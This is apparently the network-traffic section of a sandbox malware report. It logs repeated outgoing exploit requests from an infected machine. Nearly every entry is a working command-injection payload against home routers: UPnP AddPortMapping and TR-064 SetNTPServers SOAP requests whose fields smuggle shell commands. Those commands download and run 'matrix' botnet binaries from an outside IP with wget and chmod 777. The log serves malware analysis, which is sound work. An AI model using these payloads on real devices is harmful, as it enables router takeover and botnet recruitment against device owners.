                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:01.868236065 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:04.365659952 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:08.973469019 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:18.193340063 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:36.876255035 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        845192.168.2.1358922109.36.221.1547547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:00.125936031 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:00.716242075 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:01.900233030 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        846192.168.2.1340354175.202.210.467547
                                                        TimestampBytes transferredDirectionData
